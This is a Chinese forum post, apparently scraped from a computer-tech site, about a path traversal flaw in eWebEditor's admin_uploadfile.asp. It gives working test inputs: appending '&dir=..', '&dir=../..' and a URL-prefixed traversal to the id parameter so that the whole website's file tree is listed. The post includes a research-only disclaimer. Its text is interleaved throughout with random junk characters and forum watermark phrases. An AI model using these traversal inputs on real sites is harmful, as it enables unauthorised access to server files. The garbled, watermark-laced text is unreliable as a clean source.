麦迪

此漏洞比较危险...ewebeditor使用范围太广了...(前提也要有管理权限)
1 n6 ^7 u+ S. d( @eWebEditor
& J2 ?$ F, y2 w" `% E1 Pwww.520diannao.com描述:
& ^/ e6 J) ~2 n* g! t' h4 ?& a我爱电脑技术论坛eWebEditor是一个所见即所得的在线编辑器。顾名思义，就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。我爱电脑技术社区--打造最好的电脑技术自学交流平台, D7 O( E' P2 |
ewebeditor/admin_uploadfile.asp电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站& i$ T2 X2 r, }; [. d# z' |
过滤不严，造成遍历路径漏洞 我爱电脑技术社区--打造最好的电脑技术自学交流平台/ [% K$ H( R. D2 T
测试方法:
/ W; U% ]6 D( l' R) B9 ^[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
1 L- a5 K8 k% e/ j2 C" T0 r打造最好的电脑自学交流论坛ewebeditor/admin_uploadfile.asp?id=14我爱电脑技术论坛" G4 M% B$ Z$ k; P
在id=14后面添加&dir=..
% I; s/ Z# o( J7 Q8 Y0 Z我爱电脑技术论坛再加 &dir=../..我爱电脑技术社区--打造最好的电脑技术自学交流平台8 v! {- ~; n9 B; C" ?
&dir=http://www.****.com/../.. 看到整个网站文件了  
5 ~$ L2 Z, [0 P2 i- B( v/ k" n8 a打造最好的电脑自学交流论坛建议:暂无http://www.ewebeditor.net/